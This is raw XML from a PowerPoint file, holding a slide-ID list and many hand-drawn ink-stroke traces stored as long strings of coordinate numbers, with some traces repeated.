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39" r:id="rId13"/>
    <p:sldId id="440" r:id="rId14"/>
    <p:sldId id="441" r:id="rId15"/>
    <p:sldId id="442" r:id="rId16"/>
    <p:sldId id="443" r:id="rId17"/>
    <p:sldId id="444" r:id="rId18"/>
    <p:sldId id="445" r:id="rId19"/>
    <p:sldId id="446" r:id="rId20"/>
    <p:sldId id="447" r:id="rId21"/>
    <p:sldId id="448" r:id="rId22"/>
    <p:sldId id="449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61" r:id="rId35"/>
    <p:sldId id="462" r:id="rId36"/>
    <p:sldId id="463" r:id="rId37"/>
    <p:sldId id="464" r:id="rId38"/>
    <p:sldId id="465" r:id="rId39"/>
    <p:sldId id="466" r:id="rId40"/>
    <p:sldId id="467" r:id="rId41"/>
    <p:sldId id="468" r:id="rId42"/>
    <p:sldId id="469" r:id="rId43"/>
    <p:sldId id="470" r:id="rId44"/>
    <p:sldId id="471" r:id="rId45"/>
    <p:sldId id="472" r:id="rId46"/>
    <p:sldId id="473" r:id="rId47"/>
    <p:sldId id="474" r:id="rId48"/>
    <p:sldId id="475" r:id="rId49"/>
    <p:sldId id="476" r:id="rId50"/>
    <p:sldId id="477" r:id="rId51"/>
    <p:sldId id="478" r:id="rId52"/>
    <p:sldId id="480" r:id="rId53"/>
    <p:sldId id="479" r:id="rId54"/>
    <p:sldId id="481" r:id="rId55"/>
    <p:sldId id="482" r:id="rId56"/>
    <p:sldId id="483" r:id="rId57"/>
    <p:sldId id="484" r:id="rId58"/>
    <p:sldId id="485" r:id="rId59"/>
    <p:sldId id="486" r:id="rId60"/>
    <p:sldId id="487" r:id="rId61"/>
    <p:sldId id="488" r:id="rId62"/>
    <p:sldId id="489" r:id="rId63"/>
    <p:sldId id="490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151414"/>
    <a:srgbClr val="E3E1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>
        <p:scale>
          <a:sx n="150" d="100"/>
          <a:sy n="150" d="100"/>
        </p:scale>
        <p:origin x="340" y="40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09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1670 24575,'29'-34'0,"12"-13"0,42-25 0,177-119 0,112-32 0,-179 115 0,294-118 0,87 49 0,-473 150 0,1185-234 0,-706 146 0,-223 58 0,6 29 0,111-12 0,-320 15 0,94-9 0,250 29 0,-283 7 0,2165-2 0,-2353 1 0,0 0 0,29 7 0,222 41 0,-197-34 0,233 42-387,1319 163-1552,-1414-201 1939,-207-19-24,1 0 0,-1-1 0,16-3 0,1 0 2059,19 2-1958,0 1 1,-1 3-1,1 2 1,83 17-1,125 57-77,-124-34 0,721 210 0,-829-246 0,0 2 0,-1 1 0,0 1 0,-1 1 0,26 19 0,-38-25 0,124 78 0,144 102 0,107 76 0,-379-259 0,11 8 0,0 1 0,23 24 0,-36-33 0,0 1 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 7 0,0-5 0,0-1 0,0 0 0,1 1 0,0-1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,8 7 0,6 12 0,28 40 0,-22-33 0,-1 1 0,36 72 0,-52-92 0,-4-20 0,5-11 0,37-68 0,-4-1 0,-3-3 0,27-99 0,-24 53 0,-36 128 0,-3 17 0,-4 18 0,-10 14 0,-23 57 0,9-29 0,9-25 0,-3-1 0,-40 63 0,21-38 0,-24 49 0,61-114 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-4 1 0,-4-1 0,0 0 0,0 0 0,0-1 0,-12-2 0,3 2 0,-602-54-1365,561 47-5461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4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24575,'3'0'0,"1"0"0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,4 4 0,-2-1 0,0 1 0,0 1 0,0-1 0,6 10 0,-3-5 0,34 40 0,-26-33 0,23 35 0,-34-44 0,-1 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,-2-1 0,0 1 0,2 10 0,0 19 0,-2 0 0,-5 70 0,2-105 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0-1 0,-6 3 0,0 0 0,1 0 0,-1-1 0,0 0 0,0-1 0,0 0 0,0 0 0,-17 0 0,-67-3-1365,71 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9:51.2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24575,'0'437'0,"0"-434"0,0-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,3 2 0,-1-1 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,6 3 0,7 0 0,1-1 0,-1 0 0,19 1 0,-25-3 0,79 6 0,158-7 0,-121-3 0,160-8 0,-129 3 0,-8 2 0,103-6 0,-32 2 0,713-6 0,-631 16 0,-224-1 0,758 23 0,-526 9 0,21 2 0,4-21 0,83-29 0,-225 15 0,512-22 0,-536 3 0,9 0 0,-17 6 0,120-8 0,162 20 0,-228 4 0,352-2 0,-448-8 0,3 1 0,-22 0 0,-4 0 0,154-6 0,-169 12 0,139-7 0,-39 4 0,-35 2 0,-126 0 0,-1-1 0,22-6 0,-25 5 0,0 0 0,1 1 0,26-1 0,333 5 0,-374-1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 1 0,1-5 0,1-9 0,-1-1 0,0 0 0,-2 0 0,-1-29 0,0 17 0,1-136-1365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3:09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3:09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09.38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1670 24575,'29'-34'0,"12"-13"0,42-25 0,177-119 0,112-32 0,-179 115 0,294-118 0,87 49 0,-473 150 0,1185-234 0,-706 146 0,-223 58 0,6 29 0,111-12 0,-320 15 0,94-9 0,250 29 0,-283 7 0,2165-2 0,-2353 1 0,0 0 0,29 7 0,222 41 0,-197-34 0,233 42-387,1319 163-1552,-1414-201 1939,-207-19-24,1 0 0,-1-1 0,16-3 0,1 0 2059,19 2-1958,0 1 1,-1 3-1,1 2 1,83 17-1,125 57-77,-124-34 0,721 210 0,-829-246 0,0 2 0,-1 1 0,0 1 0,-1 1 0,26 19 0,-38-25 0,124 78 0,144 102 0,107 76 0,-379-259 0,11 8 0,0 1 0,23 24 0,-36-33 0,0 1 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 7 0,0-5 0,0-1 0,0 0 0,1 1 0,0-1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,8 7 0,6 12 0,28 40 0,-22-33 0,-1 1 0,36 72 0,-52-92 0,-4-20 0,5-11 0,37-68 0,-4-1 0,-3-3 0,27-99 0,-24 53 0,-36 128 0,-3 17 0,-4 18 0,-10 14 0,-23 57 0,9-29 0,9-25 0,-3-1 0,-40 63 0,21-38 0,-24 49 0,61-114 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-4 1 0,-4-1 0,0 0 0,0 0 0,0-1 0,-12-2 0,3 2 0,-602-54-1365,561 47-5461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19.9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2807 24575,'0'-4'0,"1"0"0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,2-5 0,1-2 0,10-17 0,0 0 0,2 2 0,1-1 0,1 2 0,29-29 0,123-103 0,160-88 0,-135 106 0,-88 61 0,152-81 0,-149 98 0,426-206 0,172 34 0,-442 153 0,-186 55 0,433-148 0,-216 64 0,-255 92 0,56-27 0,-74 32 0,1 0 0,0 2 0,1 1 0,0 1 0,0 1 0,1 1 0,0 2 0,0 1 0,45 2 0,447 16 0,-512-16 0,1 0 0,0 0 0,0-1 0,-1 0 0,14-4 0,-21 5 0,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-2-3 0,-1-3 0,0 1 0,0-1 0,0 1 0,-1 0 0,0 0 0,-1 1 0,-7-9 0,-41-35 0,26 26 0,-231-204 0,-116-112 0,364 329 0,16 16 0,19 19 0,116 108 0,-16-19 0,221 179 0,-136-123 0,-27-25 0,-182-145 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,-1 1 0,-210 152 0,25-17 0,142-102 0,1 3 0,-65 69 0,5-4 0,9-21-1365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1:23.1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24575,'61'3'0,"0"3"0,73 16 0,46 6 0,291 22 0,-351-37 0,84 7 0,-163-15 0,-1 1 0,0 2 0,52 18 0,-17-4 0,325 69 0,-176-43 0,-168-33 0,-2 3 0,0 2 0,74 40 0,-51-23 0,788 299 0,-849-329 0,0 0 0,0 2 0,-1 0 0,0 0 0,0 2 0,21 20 0,3 0 0,40 27 0,114 95 0,-170-131 0,0 1 0,-2 0 0,37 52 0,-10-5 0,3-4 0,3-1 0,70 64 0,-117-122 0,-1-1 0,1 0 0,1 0 0,-1 0 0,1-1 0,8 4 0,-14-8 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,2-4 0,12-25 0,-2-1 0,-1 0 0,13-66 0,-11 43 0,13-61 0,-12 47 0,40-113 0,-13 69 0,-41 150 0,-74 257 0,45-195 0,-22 131 0,51-228 0,-2 8 0,0 0 0,-6 22 0,7-30 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-7 4 0,-3 3 0,1 0 0,-12 14 0,-6 5 0,26-27 0,-1 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,-7 1 0,-43 3 0,27-3 0,-43 4 0,-171 9 0,203-13 111,0 1 0,-56 13 0,49-8-960,-52 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4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1 390 24575,'294'-7'0,"17"0"0,193 20 0,1-10 0,-263-5 0,-241 3 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0-1 0,0 1 0,0 0 0,1-2 0,-1 0 0,0 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-2-4 0,-2-6 0,-1 0 0,-1 0 0,0 0 0,-13-19 0,17 28 0,-5-5 0,1-1 0,0 0 0,0 0 0,0-1 0,2 1 0,-1-1 0,1 0 0,0-1 0,1 1 0,0-1 0,-1-10 0,1-4 0,-9-28 0,2 5 0,11 61 0,0-1 0,-1 21 0,-1-22 0,1 1 0,0-1 0,1 1 0,0-1 0,4 16 0,5 7 0,-2 1 0,-2-1 0,-1 1 0,-1 0 0,-2 44 0,-2-76 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,0-1 0,-1-1 0,-2 3 0,-10 7 0,-25 14 0,25-17 0,-2 3 0,0-1 0,-1-1 0,0 0 0,-1-2 0,-33 10 0,47-15-91,0 0 0,0 0 0,0 0 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1 1 0,-6 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2:52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1860 415 24575,'-1'0'0,"1"-1"0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,-20-3 0,18 3 0,-241-4 0,134 6 0,-1323-1 0,1432-1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-2 0,1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1-2 0,11-22 0,2 0 0,25-32 0,-12 17 0,48-57 0,-9 10 0,-56 77 0,-11 11 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-2 5 0,-13 23 0,-2 0 0,-24 33 0,-10 17 0,-18 24 0,42-63 0,21-32 0,0 0 0,0 1 0,1 0 0,-6 12 0,10-18 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0-1 0,2 5 0,2 1 0,0 0 0,0 0 0,1-1 0,0 1 0,1-1 0,-1-1 0,1 1 0,14 10 0,70 48 0,-77-57 0,-2-1-136,0 0-1,1-1 1,-1-1-1,1 0 1,0 0-1,1-2 1,-1 1-1,1-2 0,27 4 1,-29-6-6690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8:50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24575,'12'1'0,"0"0"0,1 1 0,-1 1 0,18 6 0,10 2 0,21-2 0,0-3 0,1-2 0,78-5 0,-59-1 0,93 10 0,-2 14 0,-45-4 0,222 4 0,337-24 0,-349 3 0,-200-1 0,490 17 0,-62-4 0,-376-15 0,254 2 0,-1676 0 0,1068 14 0,30-1 0,-414-10 0,292-5 0,-635 2 0,857-1 0,-61-12 0,62 7 0,-63-3 0,-52 2 0,57 1 0,3 0 0,-56-2 0,-204 8-1365,337 0-5461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9:48:53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24575,'249'-2'0,"254"4"0,-267 19 0,56 1 0,-264-20 0,1 0 0,51 13 0,14 1 0,252-8 0,-210-10 0,138 4 0,296-4 0,-405-12 0,37 0 0,-139 14 0,80-11 0,23-3-19,219 10-1,-214 5-1306,-157-1-5500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3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24575,'105'-8'0,"-3"1"0,1277 8 0,-1272-1 0,193 27 0,-180-8 0,1-5 0,185-3 0,-272-11 0,38 7 0,26 0 0,2663-8 0,-2747 1 113,0-2 0,17-3 0,22-2-1817,-41 6-5122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821 107 24575,'-127'-2'0,"-135"5"0,202 3 0,33-2 0,-32 0 0,-211-4 0,269 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,0-1 0,1-2 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,5-4 0,9-2 0,-1-1 0,-1-2 0,0 1 0,21-20 0,-34 28 0,-1 1 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,3 0 0,-5 1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-7 15 0,-5-2 0,0-1 0,-1 0 0,0-1 0,-15 10 0,-4 5 0,31-26 0,0 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,2 1 0,3 5 0,1-1 0,1 0 0,11 8 0,-12-9 0,-3-2-105,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,7 0 0,0-1-6721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5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 24575,'942'0'0,"-763"-13"0,-154 11 0,15-5 0,-28 5 0,1-1 0,18 1 0,110 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598 329 24575,'0'-3'0,"-1"0"0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,-2-3 0,-27-30 0,19 23 0,6 5 0,-180-181 0,179 182 0,-1 1 0,1-1 0,-1 2 0,0-1 0,-1 1 0,1 1 0,-1-1 0,1 1 0,-1 1 0,0-1 0,0 2 0,0-1 0,0 1 0,-1 1 0,-16 0 0,22 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-4 3 0,-32 40 0,25-29 0,6-8 0,1 0 0,0 0 0,0 0 0,1 1 0,0 0 0,1 0 0,0 1 0,0-1 0,-3 20 0,-7 19 0,10-37 0,0 1 0,1 0 0,-3 22 0,2 271 0,6-164 0,-1-74 179,1-18-694,-3-1 1,-7 51-1,6-88-6311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6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24575,'1'14'0,"0"0"0,1 0 0,1 0 0,0-1 0,1 0 0,0 1 0,10 20 0,0-6 0,2 1 0,22 29 0,-23-38 0,1 0 0,1-1 0,33 28 0,65 43 0,-12-11 0,62 85-1365,-132-128-5461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8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627 0 24575,'0'2'0,"0"6"0,-2 7 0,-6 4 0,-4 5 0,-11 13 0,-17 13 0,-19 16 0,-17 19 0,-14 13 0,-5 2 0,11-11 0,20-18 0,17-21 0,21-27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9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0 24575,'-1'49'0,"-3"0"0,-17 86 0,-37 88 0,29-117 0,16-67-1365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10.0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24575,'684'0'-1365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3.2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16 24575,'105'-8'0,"-3"1"0,1277 8 0,-1272-1 0,193 27 0,-180-8 0,1-5 0,185-3 0,-272-11 0,38 7 0,26 0 0,2663-8 0,-2747 1 113,0-2 0,17-3 0,22-2-1817,-41 6-5122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09:58.6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821 107 24575,'-127'-2'0,"-135"5"0,202 3 0,33-2 0,-32 0 0,-211-4 0,269 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,0-1 0,1-2 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,5-4 0,9-2 0,-1-1 0,-1-2 0,0 1 0,21-20 0,-34 28 0,-1 1 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,3 0 0,-5 1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-7 15 0,-5-2 0,0-1 0,-1 0 0,0-1 0,-15 10 0,-4 5 0,31-26 0,0 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,2 1 0,3 5 0,1-1 0,1 0 0,11 8 0,-12-9 0,-3-2-105,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,7 0 0,0-1-6721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5.3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30 24575,'942'0'0,"-763"-13"0,-154 11 0,15-5 0,-28 5 0,1-1 0,18 1 0,110 2-1365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6.38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24575,'1'14'0,"0"0"0,1 0 0,1 0 0,0-1 0,1 0 0,0 1 0,10 20 0,0-6 0,2 1 0,22 29 0,-23-38 0,1 0 0,1-1 0,33 28 0,65 43 0,-12-11 0,62 85-1365,-132-128-5461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8.2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627 0 24575,'0'2'0,"0"6"0,-2 7 0,-6 4 0,-4 5 0,-11 13 0,-17 13 0,-19 16 0,-17 19 0,-14 13 0,-5 2 0,11-11 0,20-18 0,17-21 0,21-27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09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126 0 24575,'-1'49'0,"-3"0"0,-17 86 0,-37 88 0,29-117 0,16-67-1365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24575,'6'0'0,"3"0"0,4 0 0,2 0 0,0 0 0,-1 0 0,3 0 0,5 0 0,8 0 0,8-4 0,8-1 0,2 1 0,-4 0 0,-7 1 0,-10 1-8191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0:10.0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24575,'684'0'-1365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4:06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 0 24575,'-5'7'0,"0"0"0,1-1 0,0 2 0,0-1 0,0 1 0,1-1 0,0 1 0,-2 11 0,-6 11 0,9-22 0,0 0 0,1 1 0,-1-1 0,2 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,0 1 0,0-1 0,1 0 0,0 0 0,1 0 0,-1 0 0,9 15 0,-11-22 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,2-1 0,-2 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-2 0,8-34 0,-8 27 0,0 0 0,-1 0 0,-1-18 0,0 24 0,1-1 0,-1 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 1 0,-5-8 0,7 10 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,-9 11 0,8-7 0,0-1 0,1 0 0,0 1 0,-1-1 0,1 1 0,-1 5 0,3 102 0,-2-176 0,-1 27 0,7-68 0,-2 214 0,-4 83 0,14-309 0,-12 91 0,-1 0 0,-1 0 0,-8-41 0,9 67 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-4 10 0,0 19 0,-1 36 0,4-40 0,-2 1 0,0-1 0,-11 41 0,12-121 0,1 4 0,0 18 0,2 1 0,5-44 0,-6 82 0,0 0 0,1 0 0,-1 0 0,1 0 0,4 12 0,0 5 0,0 16 0,-4-24 0,1-1 0,8 30 0,-10-45 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,12-16 0,-11 15 0,34-63 0,35-56 0,-70 121 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,3 11 0,-3 23 0,0-28 0,0 10 0,-2 53 0,1-62 0,0 0 0,0 1 0,0-1 0,-1 0 0,-1 0 0,-4 12 0,8-46 0,8-20 0,-3 14 0,1 1 0,15-38 0,-22 69 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,5 10 0,-2 22 0,-6 16 0,1-13 0,3 52 0,13-125 0,25-103 0,-40 161 0,-3 26 0,-23 87 0,11-47 0,13-80 0,1-7 0,-1-14 0,0-25 0,2-72 0,-2 125 0,-1-1 0,-1 1 0,-5 13 0,-7 20 0,9-11 0,6-27 0,0 0 0,0 0 0,-1 0 0,0 0 0,-5 12 0,5-51 0,3-35 0,-4-74 0,3 141 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-7 14 0,-9 28 0,13-34 0,-6 18 0,1-1 0,-14 27 0,21-88 0,2 10 0,0 9 0,-2-31 0,0 48-19,1 0-1,0 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 